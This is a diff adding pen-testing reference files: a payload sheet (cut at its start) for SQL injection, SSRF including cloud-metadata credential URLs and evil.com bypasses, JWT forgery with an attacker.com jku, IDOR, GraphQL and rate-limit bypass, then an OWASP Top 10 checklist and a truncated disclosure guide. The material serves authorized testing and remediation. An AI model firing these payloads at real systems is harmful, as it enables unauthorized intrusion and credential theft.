+ +--- + +## SQL Injection Detection Patterns + +### Detection Payloads + +**Error-based detection:** +``` +' -- Single quote triggers SQL error +" -- Double quote +\ -- Backslash +' OR '1'='1 -- Boolean true +' OR '1'='2 -- Boolean false (compare responses) +' AND 1=1-- -- Boolean true with comment +' AND 1=2-- -- Boolean false (compare responses) +1 OR 1=1 -- Numeric injection +1 AND 1=2 -- Numeric false +``` + +**Union-based enumeration** (authorized testing only): +```sql +-- Step 1: Find column count +' ORDER BY 1-- +' ORDER BY 2-- +' ORDER BY 3-- -- Increment until error +' UNION SELECT NULL-- +' UNION SELECT NULL,NULL-- -- Match column count + +-- Step 2: Find displayable columns +' UNION SELECT 'a',NULL,NULL-- +' UNION SELECT NULL,'a',NULL-- + +-- Step 3: Extract database info +' UNION SELECT version(),NULL,NULL-- +' UNION SELECT table_name,NULL,NULL FROM information_schema.tables-- +' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'-- +``` + +**Time-based blind injection:** +```sql +-- MySQL +' AND SLEEP(5)-- +' AND IF(1=1, SLEEP(5), 0)-- +' AND IF(SUBSTRING(version(),1,1)='5', SLEEP(5), 0)-- + +-- PostgreSQL +' AND pg_sleep(5)-- +'; SELECT pg_sleep(5)-- +' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)-- + +-- MSSQL +'; WAITFOR DELAY '0:0:5'-- +' AND 1=(SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)-- +``` + +**Boolean-based blind injection:** +```sql +-- Extract data one character at a time +' AND SUBSTRING(username,1,1)='a'-- +' AND ASCII(SUBSTRING(username,1,1))>96-- +' AND ASCII(SUBSTRING(username,1,1))>109-- -- Binary search +``` + +### Database-Specific Syntax + +| Feature | MySQL | PostgreSQL | MSSQL | SQLite | +|---------|-------|------------|-------|--------| +| String concat | `CONCAT('a','b')` | `'a' \|\| 'b'` | `'a' + 'b'` | `'a' \|\| 'b'` | +| Comment | `-- ` or `#` | `--` | `--` | `--` | +| Version | `VERSION()` | `version()` | `@@version` | `sqlite_version()` | +| Current user | 
`CURRENT_USER()` | `current_user` | `SYSTEM_USER` | N/A | +| Sleep | `SLEEP(5)` | `pg_sleep(5)` | `WAITFOR DELAY '0:0:5'` | N/A | + +--- + +## SSRF Detection Techniques + +### Basic Payloads + +``` +http://127.0.0.1 +http://localhost +http://0.0.0.0 +http://[::1] -- IPv6 localhost +http://[0000::1] -- IPv6 localhost (expanded) +``` + +### Cloud Metadata Endpoints + +``` +# AWS EC2 Metadata (IMDSv1) +http://169.254.169.254/latest/meta-data/ +http://169.254.169.254/latest/meta-data/iam/security-credentials/ +http://169.254.169.254/latest/user-data + +# AWS EC2 Metadata (IMDSv2 — requires token header) +# Step 1: curl -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" -X PUT http://169.254.169.254/latest/api/token +# Step 2: curl -H "X-aws-ec2-metadata-token: TOKEN" http://169.254.169.254/latest/meta-data/ + +# GCP Metadata +http://metadata.google.internal/computeMetadata/v1/ +http://169.254.169.254/computeMetadata/v1/ + +# Azure Metadata +http://169.254.169.254/metadata/instance?api-version=2021-02-01 +http://169.254.169.254/metadata/identity/oauth2/token + +# DigitalOcean Metadata +http://169.254.169.254/metadata/v1/ +``` + +### Bypass Techniques + +**IP encoding tricks:** +``` +http://0x7f000001 -- Hex encoding of 127.0.0.1 +http://2130706433 -- Decimal encoding of 127.0.0.1 +http://0177.0.0.1 -- Octal encoding +http://127.1 -- Shortened +http://127.0.0.1.nip.io -- Wildcard DNS (nip.io) that resolves to 127.0.0.1 +``` + +**URL parsing inconsistencies:** +``` +http://127.0.0.1@evil.com -- URL authority confusion +http://evil.com#@127.0.0.1 -- Fragment confusion +http://127.0.0.1%00@evil.com -- Null byte injection +http://evil.com\@127.0.0.1 -- Backslash confusion +``` + +**Redirect chains:** +``` +# If the app follows redirects, find an open redirect first: +https://target.com/redirect?url=http://169.254.169.254/ +``` + +--- + +## JWT Manipulation Patterns + +### Decode Without Verification + +JWTs are Base64URL-encoded and can be decoded without the secret: +```bash +# Decode header +echo 
"eyJhbGciOiJIUzI1NiJ9" | base64 -d +# Output: {"alg":"HS256"} + +# Decode payload (Base64URL drops "=" padding; re-add it until the length is a multiple of 4) +echo "eyJ1c2VyIjoiYWRtaW4ifQ==" | base64 -d +# Output: {"user":"admin"} +``` + +### Algorithm Confusion Attacks + +**None algorithm attack:** +```json +// Original header +{"alg": "HS256", "typ": "JWT"} + +// Modified header — set algorithm to none +{"alg": "none", "typ": "JWT"} + +// Token format: header.payload. (empty signature) +``` + +**RS256 to HS256 confusion:** +If the server uses RS256 (asymmetric), try: +1. Get the server's RSA public key (from JWKS endpoint or TLS certificate) +2. Change `alg` to `HS256` +3. Sign the token using the RSA public key as the HMAC secret +4. If the server naively uses the configured key for both algorithms, it will verify the HMAC with the public key + +### Claim Manipulation + +```json +// Common claims to modify: +{ + "sub": "1234567890", // Change to another user's ID + "role": "admin", // Escalate from "user" to "admin" + "is_admin": true, // Toggle admin flag + "exp": 9999999999, // Extend expiration far into the future + "aud": "admin-api", // Change audience + "iss": "trusted-issuer" // Spoof issuer +} +``` + +### Weak Secret Brute Force + +Common JWT secrets to try (if you have a valid token to test against): +``` +secret +password +123456 +your-256-bit-secret +jwt_secret +changeme +mysecretkey +HS256-secret +``` + +Use tools like `jwt-cracker` or `hashcat -m 16500` for dictionary attacks. + +### JWKS Injection + +If the server fetches keys from a JWKS URL in the JWT header: +```json +{ + "alg": "RS256", + "jku": "https://attacker.com/.well-known/jwks.json" +} +``` +Host your own JWKS with a key pair you control. 
+ +--- + +## API Authorization Testing (IDOR, BOLA) + +### IDOR Testing Methodology + +**Step 1: Identify resource identifiers** +Map all API endpoints and find parameters that reference resources: +``` +GET /api/users/{id}/profile +GET /api/orders/{orderId} +GET /api/documents/{docId}/download +PUT /api/users/{id}/settings +DELETE /api/comments/{commentId} +``` + +**Step 2: Create two test accounts** +- User A (attacker) and User B (victim) +- Authenticate as both and capture their tokens + +**Step 3: Cross-account access testing** +Using User A's token, request User B's resources: +``` +# Read +GET /api/users/{B_id}/profile → Should be 403 +GET /api/orders/{B_orderId} → Should be 403 + +# Write +PUT /api/users/{B_id}/settings → Should be 403 +PATCH /api/orders/{B_orderId} → Should be 403 + +# Delete +DELETE /api/comments/{B_commentId} → Should be 403 +``` + +**Step 4: ID manipulation** +``` +# Sequential IDs — increment/decrement +/api/users/100 → /api/users/101 + +# UUID prediction — not practical, but test for leaked UUIDs +# Check if UUIDs appear in other responses + +# Encoded IDs — decode and modify +/api/users/MTAw → base64 decode = "100" → encode "101" = MTAx + +# Hash-based IDs — check for predictable hashing +/api/users/md5(email) → compute md5 of known emails +``` + +### BFLA (Broken Function Level Authorization) + +Test access to administrative functions: +``` +# As regular user, try admin endpoints: +POST /api/admin/users → 403 +DELETE /api/admin/users/123 → 403 +PUT /api/admin/settings → 403 +GET /api/admin/reports → 403 +POST /api/admin/impersonate/user123 → 403 + +# Try HTTP method override: +GET /api/admin/users with X-HTTP-Method-Override: DELETE +POST /api/admin/users with _method=DELETE +``` + +### Mass Assignment Testing + +```json +// Normal user update request: +PUT /api/users/profile +{ + "name": "Normal User", + "email": "user@test.com" +} + +// Mass assignment attempt — add privileged fields: +PUT /api/users/profile +{ + "name": "Normal 
User", + "email": "user@test.com", + "role": "admin", + "is_verified": true, + "is_admin": true, + "balance": 99999, + "subscription": "enterprise", + "permissions": ["admin", "superadmin"] +} + +// Then check if any extra fields were persisted: +GET /api/users/profile +``` + +--- + +## GraphQL Security Testing Patterns + +### Introspection Query + +Use this to map the entire schema (should be disabled in production): +```graphql +{ + __schema { + queryType { name } + mutationType { name } + types { + name + kind + fields { + name + type { + name + kind + ofType { name kind } + } + args { name type { name } } + } + } + } +} +``` + +### Query Depth Attack + +Nested queries can cause exponential resource consumption: +```graphql +{ + users { + friends { + friends { + friends { + friends { + friends { + friends { + name + } + } + } + } + } + } + } +} +``` + +**Mitigation check:** Server should return an error like "Query depth exceeds maximum allowed depth." + +### Query Complexity Attack + +Wide queries with aliases: +```graphql +{ + a: users(limit: 1000) { name email } + b: users(limit: 1000) { name email } + c: users(limit: 1000) { name email } + d: users(limit: 1000) { name email } + e: users(limit: 1000) { name email } +} +``` + +### Batch Query Attack + +Send multiple operations in a single request to bypass rate limiting: +```json +[ + {"query": "mutation { login(user:\"admin\", pass:\"pass1\") { token } }"}, + {"query": "mutation { login(user:\"admin\", pass:\"pass2\") { token } }"}, + {"query": "mutation { login(user:\"admin\", pass:\"pass3\") { token } }"}, + {"query": "mutation { login(user:\"admin\", pass:\"pass4\") { token } }"}, + {"query": "mutation { login(user:\"admin\", pass:\"pass5\") { token } }"} +] +``` + +### Field Suggestion Exploitation + +GraphQL often suggests similar field names on typos: +```graphql +{ users { passwor } } +# Response: "Did you mean 'password'?" +``` + +Use this to discover hidden fields without full introspection. 
+ +### Authorization Bypass via Fragments + +```graphql +query { + publicUser(id: 1) { + name + ...on User { + email # Should be restricted + ssn # Should be restricted + creditCard # Should be restricted + } + } +} +``` + +--- + +## Rate Limiting Bypass Techniques + +These techniques help verify that rate limiting is robust during authorized testing: + +``` +# IP rotation — test if rate limiting is per-IP only +X-Forwarded-For: 1.2.3.4 +X-Real-IP: 1.2.3.4 +X-Originating-IP: 1.2.3.4 + +# Case variation — test if endpoints are case-sensitive +/api/login +/API/LOGIN +/Api/Login + +# Path variation +/api/login +/api/login/ +/api/./login +/api/login?dummy=1 + +# HTTP method variation +POST /api/login +PUT /api/login + +# Unicode encoding +/api/logi%6E +``` + +If any of these bypass rate limiting, the implementation needs hardening. diff --git a/engineering-team/security-pen-testing/references/owasp_top_10_checklist.md b/engineering-team/security-pen-testing/references/owasp_top_10_checklist.md new file mode 100644 index 0000000..09de935 --- /dev/null +++ b/engineering-team/security-pen-testing/references/owasp_top_10_checklist.md @@ -0,0 +1,440 @@ +# OWASP Top 10 (2021) — Detailed Security Checklist + +Comprehensive reference for each OWASP Top 10 category with descriptions, test procedures, code patterns to detect, remediation steps, and CVSS scoring guidance. + +--- + +## A01:2021 — Broken Access Control + +**CWEs Covered:** CWE-200, CWE-201, CWE-352, CWE-639, CWE-862, CWE-863 + +### Description + +Access control enforces policy so users cannot act outside their intended permissions. Failures typically lead to unauthorized disclosure, modification, or destruction of data, or performing business functions outside the user's limits. 
+ +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | Horizontal privilege escalation | Change user ID in API requests (`/users/123` to `/users/124`) | 403 Forbidden | +| 2 | Vertical privilege escalation | Access admin endpoints with regular user token | 403 Forbidden | +| 3 | CORS validation | Send request with `Origin: https://evil.com` | `Access-Control-Allow-Origin` must not reflect arbitrary origins | +| 4 | Forced browsing | Request `/admin`, `/debug`, `/api/internal`, `/.env`, `/swagger.json` | 403 or 404 | +| 5 | Method-based bypass | Try POST instead of GET, or PUT instead of PATCH | Authorization checks apply regardless of HTTP method | +| 6 | JWT claim manipulation | Modify `role`, `is_admin`, `user_id` claims, re-sign with weak secret | 401 Unauthorized | +| 7 | Path traversal in authorization | Request `/api/users/../admin/settings` | Canonical path check must reject traversal | +| 8 | API endpoint enumeration | Fuzz API paths with wordlists | Only documented endpoints should respond | + +### Code Patterns to Detect + +```python +# BAD: No authorization check on resource access +@app.route("/api/documents/<doc_id>") +def get_document(doc_id): + return Document.query.get(doc_id).to_json() # No ownership check! + +# GOOD: Verify ownership +@app.route("/api/documents/<doc_id>") +@login_required +def get_document(doc_id): + doc = Document.query.get_or_404(doc_id) + if doc.owner_id != current_user.id: + abort(403) + return doc.to_json() +``` + +```javascript +// BAD: Client-side only access control +{isAdmin && <AdminPanel />} // Hidden but still accessible via API + +// GOOD: Server-side middleware +app.use('/admin/*', requireRole('admin')); +``` + +### Remediation + +1. Deny by default — require explicit authorization for every endpoint +2. Implement server-side access control, never rely on client-side checks +3. Use UUIDs instead of sequential IDs for resource identifiers +4. Log and alert on access control failures +5. 
Rate limit API requests to minimize automated enumeration +6. Disable CORS or restrict to specific trusted origins +7. Invalidate server-side sessions on logout + +### CVSS Scoring Guidance + +- **Horizontal escalation (read):** CVSS 6.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N +- **Horizontal escalation (write):** CVSS 8.1 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N +- **Vertical escalation to admin:** CVSS 8.8 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H +- **Unauthenticated admin access:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + +--- + +## A02:2021 — Cryptographic Failures + +**CWEs Covered:** CWE-259, CWE-327, CWE-328, CWE-330, CWE-331 + +### Description + +Failures related to cryptography that often lead to sensitive data exposure. This includes using weak algorithms, improper key management, and transmitting data in cleartext. + +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | TLS version | `nmap --script ssl-enum-ciphers -p 443 target` | Only TLS 1.2+ accepted | +| 2 | Certificate validity | `openssl s_client -connect target:443` | Valid cert, not self-signed | +| 3 | HSTS header | Check response headers | `Strict-Transport-Security: max-age=31536000` | +| 4 | Password storage | Review auth code | bcrypt/scrypt/argon2 with cost >= 10 | +| 5 | Sensitive data in URLs | Review access logs | No tokens, passwords, or PII in query params | +| 6 | Encryption at rest | Check database/storage config | Sensitive fields encrypted (AES-256-GCM) | +| 7 | Key management | Review key storage | Keys in secrets manager, not in code/env files | +| 8 | Random number generation | Review token generation code | Uses crypto-grade PRNG (secrets module, crypto.randomBytes) | + +### Code Patterns to Detect + +```python +# BAD: MD5 for password hashing +password_hash = hashlib.md5(password.encode()).hexdigest() + +# BAD: Hardcoded encryption key +cipher = AES.new(b"mysecretkey12345", AES.MODE_GCM) + +# BAD: Weak random for 
tokens +token = str(random.randint(100000, 999999)) + +# GOOD: bcrypt for passwords +password_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=12)) + +# GOOD: Secrets module for tokens +token = secrets.token_urlsafe(32) +``` + +### Remediation + +1. Use TLS 1.2+ for all data in transit; redirect HTTP to HTTPS +2. Use bcrypt (cost 12+), scrypt, or argon2id for password hashing +3. Use AES-256-GCM for encryption at rest +4. Store keys in a secrets manager (Vault, AWS Secrets Manager, GCP Secret Manager) +5. Use `secrets` (Python) or `crypto.randomBytes` (Node.js) for token generation +6. Enable HSTS with preload +7. Never store sensitive data in URLs or logs + +### CVSS Scoring Guidance + +- **Cleartext transmission of passwords:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N +- **Weak password hashing (MD5):** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N +- **Hardcoded encryption key:** CVSS 7.2 — AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + +--- + +## A03:2021 — Injection + +**CWEs Covered:** CWE-20, CWE-74, CWE-75, CWE-77, CWE-78, CWE-79, CWE-89 + +### Description + +Injection flaws occur when untrusted data is sent to an interpreter as part of a command or query. Includes SQL, NoSQL, OS command, LDAP, XPath, and template injection. 
+ +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | SQL injection | Submit `' OR 1=1--` in input fields | No data leakage, proper error handling | +| 2 | Blind SQL injection | Submit `' AND SLEEP(5)--` | No 5-second delay in response | +| 3 | NoSQL injection | Submit `{"$gt":""}` in JSON fields | No data leakage | +| 4 | XSS (reflected) | Submit `<script>alert(document.domain)</script>` | Input is escaped/encoded in response | +| 5 | XSS (stored) | Submit payload in persistent fields | Payload is sanitized before storage | +| 6 | Command injection | Submit `; whoami` in fields | No command execution | +| 7 | Template injection | Submit `{{7*7}}` | No "49" in response | +| 8 | LDAP injection | Submit `*)(uid=*))(\|(uid=*` | No directory enumeration | + +### Code Patterns to Detect + +```python +# BAD: String concatenation in SQL +cursor.execute("SELECT * FROM users WHERE email = '" + email + "'") +cursor.execute(f"SELECT * FROM users WHERE email = '{email}'") + +# GOOD: Parameterized query +cursor.execute("SELECT * FROM users WHERE email = %s", (email,)) +``` + +```javascript +// BAD: Template literal in SQL +db.query(`SELECT * FROM users WHERE id = ${userId}`); + +// GOOD: Parameterized query +db.query('SELECT * FROM users WHERE id = $1', [userId]); +``` + +### Remediation + +1. Use parameterized queries / prepared statements for ALL database operations +2. Use ORM methods with bound parameters (not raw queries) +3. Validate and sanitize all input on the server side +4. Use Content-Security-Policy to mitigate XSS impact +5. Escape output based on context (HTML, JS, URL, CSS) +6. Never pass user input to eval(), exec(), os.system(), or child_process +7. 
Use allowlists for expected input formats + +### CVSS Scoring Guidance + +- **SQL injection (unauthenticated):** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H +- **Stored XSS:** CVSS 5.4 — AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N +- **Reflected XSS:** CVSS 6.1 — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N +- **Command injection:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + +--- + +## A04:2021 — Insecure Design + +**CWEs Covered:** CWE-209, CWE-256, CWE-501, CWE-522 + +### Description + +Insecure design represents weaknesses in the design and architecture of the application, distinct from implementation bugs. This includes missing or ineffective security controls. + +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | Rate limiting | Send 100 rapid requests to login | 429 after threshold (5-10 attempts) | +| 2 | Business logic abuse | Submit negative quantities, skip payment | All calculations server-side | +| 3 | Account lockout | 10+ failed login attempts | Account locked or CAPTCHA triggered | +| 4 | Multi-step flow bypass | Skip steps via direct URL access | Server validates state at each step | +| 5 | Password reset abuse | Request multiple reset tokens | Previous tokens invalidated | + +### Remediation + +1. Use threat modeling during design phase (STRIDE, PASTA) +2. Implement rate limiting on all sensitive endpoints +3. Validate business logic on the server, never trust client calculations +4. Use state machines for multi-step workflows +5. 
Implement CAPTCHA for public-facing forms after threshold + +### CVSS Scoring Guidance + +- **Missing rate limit on auth:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N +- **Business logic bypass (financial):** CVSS 8.1 — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H + +--- + +## A05:2021 — Security Misconfiguration + +**CWEs Covered:** CWE-2, CWE-11, CWE-13, CWE-15, CWE-16, CWE-388 + +### Description + +The application is improperly configured, with default settings, unnecessary features enabled, verbose error messages, or missing security hardening. + +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | Default credentials | Try admin:admin, root:root | Rejected | +| 2 | Debug mode | Trigger application errors | No stack traces in response | +| 3 | Security headers | Check response headers | CSP, X-Frame-Options, XCTO, HSTS present | +| 4 | HTTP methods | Send OPTIONS request | Only required methods allowed | +| 5 | Directory listing | Request directory without index | Listing disabled (403 or redirect) | +| 6 | Server version disclosure | Check Server and X-Powered-By headers | Version info removed | +| 7 | Error messages | Submit invalid data | Generic error messages, no internal details | + +### Remediation + +1. Disable debug mode in production +2. Remove default credentials and accounts +3. Add all security headers (CSP, HSTS, X-Frame-Options, XCTO, Referrer-Policy) +4. Remove Server and X-Powered-By headers +5. Disable directory listing +6. 
Implement generic error pages + +### CVSS Scoring Guidance + +- **Debug mode in production:** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N +- **Default admin credentials:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H +- **Missing security headers:** CVSS 4.3 — AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + +--- + +## A06:2021 — Vulnerable and Outdated Components + +**CWEs Covered:** CWE-1035, CWE-1104 + +### Description + +Components (libraries, frameworks, software modules) with known vulnerabilities that can undermine application defenses. + +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | npm audit | `npm audit --json` | No critical or high vulnerabilities | +| 2 | pip-audit | `pip-audit --desc` | No known CVEs | +| 3 | Go vulncheck | `govulncheck ./...` | No reachable vulnerabilities | +| 4 | EOL check | Compare framework versions to vendor EOL dates | No EOL components | +| 5 | License audit | Check dependency licenses | No copyleft licenses in proprietary code | + +### Remediation + +1. Run dependency audits in CI/CD (block merges on critical/high) +2. Set up automated dependency update PRs (Dependabot, Renovate) +3. Pin dependency versions in lock files +4. Remove unused dependencies +5. Subscribe to security advisories for key dependencies + +### CVSS Scoring Guidance + +Inherit the CVSS score from the upstream CVE. Add environmental metrics based on reachability. + +--- + +## A07:2021 — Identification and Authentication Failures + +**CWEs Covered:** CWE-255, CWE-259, CWE-287, CWE-288, CWE-384, CWE-798 + +### Description + +Weaknesses in authentication mechanisms that allow attackers to compromise passwords, keys, session tokens, or exploit implementation flaws to assume other users' identities. 
+ +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | Brute force | 100 rapid login attempts | Account lockout or exponential backoff | +| 2 | Session cookie flags | Inspect cookies in browser | HttpOnly, Secure, SameSite set | +| 3 | Session invalidation | Logout, replay session cookie | 401 Unauthorized | +| 4 | Username enumeration | Submit valid/invalid usernames | Identical error messages | +| 5 | Password policy | Submit "12345" as password | Rejected (min 8 chars, complexity) | +| 6 | Password reset token | Request reset, check token expiry | Token expires in 15-60 minutes | +| 7 | MFA bypass | Skip MFA step via direct API call | Requires MFA completion | + +### Remediation + +1. Implement multi-factor authentication +2. Set session cookies with HttpOnly, Secure, SameSite=Strict +3. Invalidate sessions on logout and password change +4. Use generic error messages ("Invalid credentials" not "User not found") +5. Enforce strong password policy (NIST SP 800-63B) +6. Expire password reset tokens within 15-60 minutes + +### CVSS Scoring Guidance + +- **Authentication bypass:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H +- **Session fixation:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N +- **Username enumeration:** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + +--- + +## A08:2021 — Software and Data Integrity Failures + +**CWEs Covered:** CWE-345, CWE-353, CWE-426, CWE-494, CWE-502, CWE-565, CWE-829 + +### Description + +Code and infrastructure that does not protect against integrity violations, including unsafe deserialization, unsigned updates, and CI/CD pipeline manipulation. 
+ +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | Unsafe deserialization | Send crafted serialized objects | Rejected or safely handled | +| 2 | SRI on CDN resources | Check script/link tags | Integrity attribute present | +| 3 | CI/CD pipeline | Review pipeline config | Signed commits, protected branches | +| 4 | Update integrity | Check update mechanism | Signed artifacts, hash verification | + +### Remediation + +1. Use `yaml.safe_load()` instead of `yaml.load()` +2. Avoid `pickle.loads()` on untrusted data +3. Add SRI hashes to all CDN-loaded scripts +4. Sign all deployment artifacts +5. Protect CI/CD pipeline with branch protection and signed commits + +### CVSS Scoring Guidance + +- **Unsafe deserialization (RCE):** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H +- **Missing SRI on CDN scripts:** CVSS 6.1 — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + +--- + +## A09:2021 — Security Logging and Monitoring Failures + +**CWEs Covered:** CWE-117, CWE-223, CWE-532, CWE-778 + +### Description + +Without sufficient logging and monitoring, breaches cannot be detected. Logging too little means missed attacks; logging too much (sensitive data) creates new risks. + +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | Auth event logging | Attempt valid/invalid logins | Both logged with timestamp and IP | +| 2 | Sensitive data in logs | Review log output | No passwords, tokens, PII, credit cards | +| 3 | Alert thresholds | Trigger 50 failed logins | Alert generated | +| 4 | Log integrity | Check log storage | Append-only or integrity-protected storage | +| 5 | Admin action audit trail | Perform admin actions | All actions logged with user identity | + +### Remediation + +1. Log all authentication events (success and failure) +2. Sanitize logs — strip passwords, tokens, PII before writing +3. Set up alerting on anomalous patterns (SIEM integration) +4. 
Use append-only log storage (CloudWatch, Splunk, immutable S3) +5. Maintain audit trail for all admin and data-modifying actions + +### CVSS Scoring Guidance + +Logging failures are typically scored as contributing factors rather than standalone vulnerabilities. When combined with other findings, they increase the overall risk level. + +--- + +## A10:2021 — Server-Side Request Forgery (SSRF) + +**CWEs Covered:** CWE-918 + +### Description + +SSRF occurs when a web application fetches a remote resource without validating the user-supplied URL, allowing attackers to reach internal services, cloud metadata endpoints, or other protected resources. + +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | Internal IP access | Submit `http://127.0.0.1` in URL fields | Request blocked | +| 2 | Cloud metadata | Submit `http://169.254.169.254/latest/meta-data/` | Request blocked | +| 3 | IPv6 localhost | Submit `http://[::1]` | Request blocked | +| 4 | DNS rebinding | Use DNS rebinding service | Request blocked after resolution | +| 5 | URL encoding bypass | Submit `http://0x7f000001` (hex localhost) | Request blocked | +| 6 | Open redirect chain | Find open redirect, chain to internal URL | Request blocked | + +### Code Patterns to Detect + +```python +# BAD: User-controlled URL without validation +url = request.args.get("url") +response = requests.get(url) # SSRF! + +# GOOD: URL allowlist validation +ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"} +parsed = urlparse(url) +if parsed.hostname not in ALLOWED_HOSTS: + abort(403, "URL not in allowlist") +response = requests.get(url) +``` + +### Remediation + +1. Validate and allowlist outbound URLs (domain, scheme, port) +2. Block requests to private IP ranges (10.x, 172.16-31.x, 192.168.x, 127.x, 169.254.x) +3. Block requests to cloud metadata endpoints +4. Use a dedicated egress proxy for outbound requests +5. Disable unnecessary URL-fetching features +6. 
Resolve DNS and validate the IP address before making the request + +### CVSS Scoring Guidance + +- **SSRF to cloud metadata (credential theft):** CVSS 9.1 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N +- **SSRF to internal service (read):** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N +- **Blind SSRF (no response data):** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N diff --git a/engineering-team/security-pen-testing/references/responsible_disclosure.md b/engineering-team/security-pen-testing/references/responsible_disclosure.md new file mode 100644 index 0000000..1088fb0 --- /dev/null +++ b/engineering-team/security-pen-testing/references/responsible_disclosure.md @@ -0,0 +1,317 @@ +# Responsible Disclosure Guide + +A complete guide for responsibly reporting security vulnerabilities found during authorized testing or independent security research. + +--- + +## Disclosure Timeline Templates + +### Standard 90-Day Disclosure + +The industry-standard timeline used by Google Project Zero, CERT/CC, and most security researchers. 
+ +| Day | Action | Owner | +|-----|--------|-------| +| 0 | Discover vulnerability, document with evidence | Researcher | +| 1 | Submit initial report to vendor security contact | Researcher | +| 3 | Confirm report received (if no auto-acknowledgment) | Researcher | +| 7 | Follow up if no acknowledgment received | Researcher | +| 7 | Acknowledge receipt, assign tracking ID | Vendor | +| 14 | Provide initial severity assessment and timeline | Vendor | +| 30 | First status update on remediation progress | Vendor | +| 30 | Request update if none provided | Researcher | +| 60 | Second status update; fix should be in development | Vendor | +| 60 | Offer technical assistance if fix is delayed | Researcher | +| 90 | Public disclosure deadline (with or without fix) | Researcher | +| 90+ | Coordinate joint disclosure statement if fix is ready | Both | + +### Accelerated 30-Day Disclosure + +For actively exploited vulnerabilities or critical severity (CVSS 9.0+): + +| Day | Action | +|-----|--------| +| 0 | Discover, document, report immediately | +| 1 | Vendor acknowledges | +| 7 | Vendor provides remediation timeline | +| 14 | Status update; patch expected | +| 30 | Public disclosure | + +### Extended 120-Day Disclosure + +For complex vulnerabilities requiring architectural changes: + +| Day | Action | +|-----|--------| +| 0 | Report submitted | +| 14 | Vendor acknowledges, confirms complexity | +| 30 | Vendor provides detailed remediation plan | +| 60 | Status update, partial fix may be deployed | +| 90 | Near-complete remediation expected | +| 120 | Full disclosure | + +**When to extend:** Only if the vendor is actively working on a fix and communicating progress. A vendor that goes silent does not earn extra time. 
+ +--- + +## Communication Templates + +### Initial Vulnerability Report + +``` +Subject: Security Vulnerability Report — [Brief Title] + +To: security@[vendor].com + +Dear Security Team, + +I am writing to report a security vulnerability I discovered in [Product/Service Name]. + +## Summary +- **Vulnerability Type:** [e.g., SQL Injection, SSRF, Authentication Bypass] +- **Severity:** [Critical/High/Medium/Low] (CVSS: X.X) +- **Affected Component:** [e.g., /api/login endpoint, User Profile page] +- **Discovery Date:** [YYYY-MM-DD] + +## Description +[Clear, technical description of the vulnerability — what it is, where it exists, and why it matters.] + +## Steps to Reproduce +1. [Step 1] +2. [Step 2] +3. [Step 3] + +## Evidence +[Screenshots, request/response pairs, or proof-of-concept code. Non-destructive only.] + +## Impact +[What an attacker could achieve by exploiting this vulnerability.] + +## Suggested Remediation +[Your recommendation for fixing the issue.] + +## Disclosure Timeline +I follow a [90-day] responsible disclosure policy. I plan to publicly disclose this finding on [DATE] unless we agree on an alternative timeline. + +## Researcher Information +- Name: [Your Name] +- Organization: [Your Organization, if applicable] +- Contact: [Your Email] +- PGP Key: [Fingerprint or link to public key] + +I have not accessed any user data, modified any systems, or shared this information with anyone else. I am happy to provide additional details or assist with remediation. + +Best regards, +[Your Name] +``` + +### Follow-Up (No Response After 7 Days) + +``` +Subject: Re: Security Vulnerability Report — [Brief Title] (Follow-Up) + +Dear Security Team, + +I am following up on the security vulnerability report I submitted on [DATE] regarding [Brief Title]. + +I have not yet received an acknowledgment. Could you please confirm receipt and provide an estimated timeline for review? + +For reference, my original report is included below / attached. 
